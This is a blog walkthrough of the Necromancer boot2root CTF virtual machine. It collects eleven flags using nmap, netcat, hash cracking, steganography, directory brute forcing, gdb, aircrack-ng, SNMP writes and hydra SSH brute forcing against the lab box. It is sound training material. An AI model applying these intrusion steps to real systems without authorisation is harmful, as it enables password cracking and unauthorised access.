30 March 2023

Pentesting Fun Stuff

following the cyber security path…

The Necromancer: 1




The Necromancer boot2root box was created for a recent SecTalks Brisbane CTF competition.
There are 11 flags to collect on your way to solving the challenging, and the difficulty level is considered as beginner.
The end goal is simple… destroy The Necromancer!


I started out with a simple nmap scan, but it came back empty. All ports are filtered. I tried another scan, but this time an intensive scan. Still nothing. Because I focused mainly on the TCP ports, I did another scan and this time I focused on the UDP ports.

└──╼ $sudo nmap -v -A -T4 -sU -Pn- -p 1-1000 Starting Nmap 7.25BETA1 (https://nmap.org ) at 2016-09-05 07:53 CEST
 Not shown: 1000 filtered ports, 999 open|filtered ports
 666/udp closed doom MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: VoIP phone Running: Cisco embedded OS CPE: cpe:/h:cisco:unified_ip_phone_7912 OS
 details: Cisco IP Phone 7912-series Network Distance: 1 hop

I got one hit and that port was closed. But it was more information than before. According to the scan, the service on that port was a VoIP phone running Cisco. I tried another UDP scan, but only aimed on port 666. This time it was open.

└──╼ $sudo nmap -A -T4 -sU -Pn -p-
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-09-05 07:18 CEST
Nmap scan report for
Host is up (0.00040s latency).
666/udp open doom?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
1 0.40 ms
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.25 seconds

There is some output from the nmap scan: “You gasp for air! Time is running out!”. After I tried to connect to the port using netcat the connection timed-out. All other options were similar. Another connection just wouldn’t happen. Because this looked like a hopeless case and I needed to know what was happening, I fire-up wireshark.


After capturing some packets I could that the VM was doing ARP requests to every IP address in the subnet. After a while there was a SYN request coming from the VM to an IP on port 4444. This occurred several times at different IP addresses. Let’s try and connect through port 4444.

Secret message

└──╼ $sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 49014

After some waiting I got a connection end received some sort of code. It looked like base64 to me, so I tried to decode it.

You find yourself staring towards the horizon, with nothing but silence surrounding you. You look east, then south, then west, all you can see is a great wasteland of nothingness.
Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.
The air around you begins to get thicker, and your heart begins to beat against your chest. You turn to your left.. then to your right! You are trapped!
You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.
As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.
You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.
You open the box, and find a parchment with the following written on it. “Chant the string of flag1 – u666”

Nice. The first flag is in. Looks like md5.

└──╼ $findmyhash MD5 -h e6078b9b1aac915d11b9fd59791030bf
***** HASH CRACKED!! *****
The original string is: opensesame
The following hashes were cracked:
e6078b9b1aac915d11b9fd59791030bf -> opensesame

Open sesame

Time to follow the instructions. “Chant the string of flag1”. Now that I know what the string is I can chant away.

└──╼ $sudo nc -nv -u 666
(UNKNOWN) [] 666 (?) open

A loud crack of thunder sounds as you are knocked to your feet!
Dazed, you start to feel fresh air entering your lungs.
You are free!
In front of you written in the sand are the words:
As you stand to your feet you notice that you can no longer see the flicker of light in the distance.
You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.
As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.
The birds get closer, and closer, and closer.
Staring up at the crows you can see they are in a formation.
Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.
As quickly as the birds appeared, they have left you once again…. alone… tortured by the deafening sound of silence.
666 is closed.

Alright. I got flag number 2 and a hint that port 80 might be open. First to check out what the original string looks like.

└──╼ $findmyhash MD5 -h c39cd4df8f2e35d20d92c2e44de5f7c6
Cracking hash: c39cd4df8f2e35d20d92c2e44de5f7c6
***** HASH CRACKED!! *****
The original string is: 1033750779
The following hashes were cracked:
c39cd4df8f2e35d20d92c2e44de5f7c6 -> 1033750779

Port 80

Hours have passed since you first started to follow the crows.
Silence continues to engulf you as you treck towards a mountain range on the horizon.
More times passes and you are now standing in front of a great chasm.
Across the chasm you can see a necromancer standing in the mouth of a cave, staring skyward at the circling crows.
As you step closer to the chasm, a rock dislodges from beneath your feet and falls into the dark depths.
The necromancer looks towards you with hollow eyes which can only be described as death.
He smirks in your direction, and suddenly a bright light momentarily blinds you.
The silence is broken by a blood curdling screech of a thousand birds, followed by the necromancers laughs fading as he decends into the cave!
The crows break their formation, some flying aimlessly in the air; others now motionless upon the ground.
The cave is now protected by a gaseous blue haze, and an organised pile of feathers lay before you.

After a few options like brute forcing possible pages and files with dirb and making a word-list from the site with cewl (which all got no result), I turned towards the picture. There was nothing useful in the EXIF data, but when I used hexdump I got another clue.
It seemed there was a text file embedded within the picture.

└──╼ $foremost -i /home/n13mant/CTF/necromancer/pileoffeathers.jpg -T
Processing: /home/n13mant/CTF/necromancer/pileoffeathers.jpg

There was another base64 encoded strings inside the text file.

└──╼ $echo 'ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ' | base64 -d
flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm

Alright. flag 3 and a way to move forward.

Across the chasm


You cautiously make your way across chasm.
You are standing on a snow covered plateau, surrounded by shear cliffs of ice and stone.
The cave before you is protected by some sort of spell cast by the necromancer.
You reach out to touch the gaseous blue haze, and can feel life being drawn from your soul the closer you get.
Hastily you take a few steps back away from the cave entrance.
There must be a magical item that could protect you from the necromancer’s spell.

Magical item

I broke my head on this one. Checked out the picture….nothing. Checked out the source code and HTML header…..nothing. Tried to brute force  possible pages or files with dirb….nothing. So the answer should be inside the text. There was something that could help me with the next piece of the puzzle. After a while there was a sentence where there was an ambiguous use of words. “There must be a magical item that could protect you from the necromancer’s spell.“. When I check on Google for alternative words for magical item, I got a fa long list of possibilities. So there was logic in my thinking. Too bad none were another page, but it gave me the idea to form a list with these words and give dirb another change.

└──╼ $cewl -d 2 -m 5 "http://www.macmillandictionary.com/thesaurus-category/british/magical-objects-and-potions-and-lucky-charms" -w magic.dic
└──╼ $dirb /home/n13mant/CTF/necromancer/magic.dic
---- Scanning URL: ----
+ (CODE:200|SIZE:9676)

When running the page I receive an executable.

└──╼ $strings talisman

These look like some functions that are interesting.

└──╼ $gdb talisman
(gdb) info functions
All defined functions:
Non-debugging symbols:
0x080482d0 _init
0x08048310 printf@plt
0x08048320 __libc_start_main@plt
0x08048330 __isoc99_scanf@plt
0x08048350 _start
0x08048380 __x86.get_pc_thunk.bx
0x08048390 deregister_tm_clones
0x080483c0 register_tm_clones
0x08048400 __do_global_dtors_aux
0x08048420 frame_dummy
0x0804844b unhide
0x0804849d hide
0x080484f4 myPrintf
0x08048529 wearTalisman
0x08048a13 main
0x08048a37 chantToBreakSpell
0x08049530 __libc_csu_init
0x08049590 __libc_csu_fini
0x08049594 _fini
(gdb) break wearTalisman
Breakpoint 1 at 0x804852d
(gdb) run
Starting program: /home/n13mant/CTF/necromancer/talisman
Breakpoint 1, 0x0804852d in wearTalisman ()
(gdb) jump chantToBreakSpell
Continuing at 0x8048a3b.
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
Chant these words at u31337
[Inferior 1 (process 9050) exited normally]

Nice. Another flag and a way to move forward.

└──╼ $findmyhash MD5 -h ea50536158db50247e110a6c89fcf3d3
Cracking hash: ea50536158db50247e110a6c89fcf3d3
Analyzing with my-addr (http://md5.my-addr.com)...
***** HASH CRACKED!! *****
The original string is: blackmagic
The following hashes were cracked:
ea50536158db50247e110a6c89fcf3d3 -> blackmagic


└──╼ $nc -nv -u 31337
(UNKNOWN) [] 31337 (?) open

As you chant the words, a hissing sound echoes from the ice walls.
The blue aura disappears from the cave entrance.
You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.
You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.
The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.
Suddenly, you are attacked by a swarm of bats!
You aimlessly thrash at the air in front of you!
The bats continue their relentless attack, until…. silence.
Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.
Looking towards one of the torches, you see something on the cave wall.
You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.

The necromancer

You continue to make your way through the cave.
In the distance you can see a familiar flicker of light moving in and out of the shadows.
As you get closer to the light you can hear faint footsteps, followed by the sound of a heavy door opening.
You move closer, and then stop frozen with fear.
It’s the necromancer!


Again he stares at you with deathly hollow eyes.
He is standing in a doorway; a staff in one hand, and an object in the other.
Smirking, the necromancer holds the staff and the object in the air.
He points his staff in your direction, and the stench of death and decay begins to fill the air.
You stare into his eyes and then…….
…… darkness. You open your eyes and find yourself lying on the damp floor of the cave.
The amulet must have saved you from whatever spell the necromancer had cast.
You stand to your feet. Behind you, only darkness.
Before you, a large door with the symbol of a skull engraved into the surface.
Looking closer at the skull, you can see u161 engraved into the forehead.

There is a link for obtaining another file. I download the file and thought about what u161 could mean. With previous hints I connected with that port, so in this case I think I also need to connect with UDP port 161. But I think I need another ‘magic’ word to chant. The hash of flag 5 is ‘809472671’. The hash from flag 6 I couldn’t crack.


The file was compressed and after decompressing it, I got a tcpdump file which I ran with wireshark. The traffic consisted only of 802.11 legacy (WiFi). Only problem was that it was all encrypted. In this case I relied on aircrack-ng to brute force the needed password.

KEY FOUND! [ death2all ]

Now that I have the secret key I can read the traffic in wireshark.
When I went over the file there was nothing really that looked interesting. There was however 1 thing that stood out among the rest. The communication between a Samsung device and a d-link router.

wlan.addr == f4:7b:5e:ef:3b:1e

The only thing that was remotely name-like was the SSID the router was casting: ‘community’. OK. So I have a hint about connecting to UDP port 161. That’s a SNMP port. I have a password that decrypts WiFi traffic, only to show information about an SSID called ‘community’. With SNMP there is a SNMP Read-Only Community String that works like a password.
The door is ‘Locked’ and to defeat the necromancer I must ‘Unlock’ the door. Still need to work with SNMP. Let’s try and change the Location from ‘Locked’ to ‘Unlocked’. Problem is I don’t have the right OID. So I need to run another tool. I didn’t had it installed, but for this I’ll use snmpwalk (for which I will need to install snmp).

└──╼ $sudo snmpwalk -v1 -c death2all
iso. = STRING: "You stand in front of a door."
iso. = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso. = STRING: "Fear the Necromancer!"
iso. = STRING: "Locked - death2allrw!"
End of MIB
└──╼ $sudo snmpset -v1 -c death2allrw iso. s Unlocked
iso. = STRING: "Unlocked"
└──╼ $sudo snmpwalk -v1 -c death2all = STRING: "You stand in front of a door."
iso. = STRING: "The door is unlocked! You may now enter the Necromancer's lair!"
iso. = STRING: "Fear the Necromancer!"
iso. = STRING: "flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22"
End of MIB

Entering the lair of the beast

After this I finally got my 7th flag, which was ‘demonslayer’ cracked, and a clue on where to look for next. I may enter the necromancers lair on port 22. So the username will probably be ‘necromancer’ and the password is the cracked hash from flag 7. But that wasn’t the case. I tried different combinations, but was getting nowhere.

└──╼ $sudo hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-05 15:20:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: login: demonslayer password: 12345678

After I entered the lair of the beast I looked for something to hold on to.

└──╼ $ ssh demonslayer@ -p 22
demonslayer@'s password:
$ ls -lah
total 40
drwxr-xr-x 3 demonslayer demonslayer 512B Jun 23 05:38 .
drwxr-xr-x 3 root wheel 512B May 11 18:25 ..
-rw-r--r-- 1 demonslayer demonslayer 87B May 11 18:25 .Xdefaults
-rw-r--r-- 1 demonslayer demonslayer 773B May 11 18:25 .cshrc
-rw-r--r-- 1 demonslayer demonslayer 103B May 11 18:25 .cvsrc
-rw-r--r-- 1 demonslayer demonslayer 359B May 11 18:25 .login
-rw-r--r-- 1 demonslayer demonslayer 175B May 11 18:25 .mailrc
-rw-r--r-- 1 demonslayer demonslayer 218B May 11 18:25 .profile
drwx------ 2 demonslayer demonslayer 512B May 11 18:25 .ssh
-rw-r--r-- 1 demonslayer demonslayer 706B May 11 21:19 flag8.txt
$ cat flag8.txt

You enter the Necromancer’s Lair!
A stench of decay fills this place.
Jars filled with parts of creatures litter the bookshelves.
A fire with flames of green burns coldly in the distance.
Standing in the middle of the room with his back to you is the Necromancer.
In front of him lies a corpse, indistinguishable from any living creature you have seen before.
He holds a staff in one hand, and the flickering object in the other.
“You are a fool to follow me here! Do you not know who I am!”
The necromancer turns to face you. Dark words fill the air!
“You are damned already my friend. Now prepare for your own death!”
Defend yourself! Counter attack the Necromancer’s spells at u777!

Fighting the beast!

Here in the lair of the beast I need to fight him with the given task.

$ nc -nv -u 777
Connection to 777 port [udp/*] succeeded!

** You only have 3 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 2 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 1 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 0 hitpoints left! **
Defend yourself from the Necromancer’s Spells!
Where do the Black Robes practice magic of the Greater Path?
!!!!!!! You have been defeated by The Necromancer! (*_*) !!!!!!!

Without having the opportunity to give a proper answer, the connection is closed and I’m knocked out of the lair. Guess the knock down was so hard, I need to start over from scratch. After trying to get back on my feet it seems the whole VM got back to its initial phase!!!! This isn’t just a troll…..it’s a mental breakdown.
After repeating the whole process I’m back at the lair to face the necromancer. After checking my notes I see the error of my ways. When using netcat I also used the options -nv which ran through the script giving empty answers.

$ nc -u 777
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path? Kelewan
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Who did Johann Faust VIII make a deal with? Mephistopheles
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Who is tricked into passing the Ninth Gate? Hedge

A great flash of light knocks you to the ground; momentarily blinding you!
As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.
An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.
The room is silent.
You walk over to where the Necromancer once stood.
On the ground is a small vile.

I hoped to get some information from the cracked hashes, but that wasn’t so.
flag 8: Kelewan
flag 9: Mephistopheles
flag 10: Hedge

$ ls -lah
total 44
drwxr-xr-x 3 demonslayer demonslayer 512B Sep 6 02:45 .
drwxr-xr-x 3 root wheel 512B May 11 18:25 ..
-rw-r--r-- 1 demonslayer demonslayer 87B May 11 18:25 .Xdefaults
-rw-r--r-- 1 demonslayer demonslayer 773B May 11 18:25 .cshrc
-rw-r--r-- 1 demonslayer demonslayer 103B May 11 18:25 .cvsrc
-rw-r--r-- 1 demonslayer demonslayer 359B May 11 18:25 .login
-rw-r--r-- 1 demonslayer demonslayer 175B May 11 18:25 .mailrc
-rw-r--r-- 1 demonslayer demonslayer 218B May 11 18:25 .profile
-rw-r--r-- 1 demonslayer demonslayer 196B Sep 6 02:37 .smallvile
drwx------ 2 demonslayer demonslayer 512B May 11 18:25 .ssh
-rw-r--r-- 1 demonslayer demonslayer 706B May 11 21:19 flag8.txt

When looking at my notes I saw a small change with before. There was a hidden file which wasn’t there before the battle. It was the small vile on the ground.

$ cat .smallvile

You pick up the small vile.
Inside of it you can see a green liquid.
Opening the vile releases a pleasant odour into the air.
You drink the elixir and feel a great power within your veins!

With great power comes great responsibility

To see what great power is bestowed upon me, I use sudo -l.

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:
User demonslayer may run the following commands on thenecromancer:
 (ALL) NOPASSWD: /bin/cat /root/flag11.txt
$ sudo cat /root/flag11.txt
Suddenly you feel dizzy and fall to the ground!
As you open your eyes you find yourself staring at a computer screen.
Congratulations!!! You have conquered......


 by @xerubus
Big shout out to Dook and Bull for being test bunnies.
Cheers OJ for the obfuscation help.
Thanks to SecTalks Brisbane and their sponsors for making these CTF challenges possible.
" xerubus (@xerubus) - www.mogozobo.com "


As far as a themed boot2root, this was one of the most awesome I ever did!
This b2r was filled with a good deal of different challenges in a wide range.
Excellent work for the people who created this masterpiece.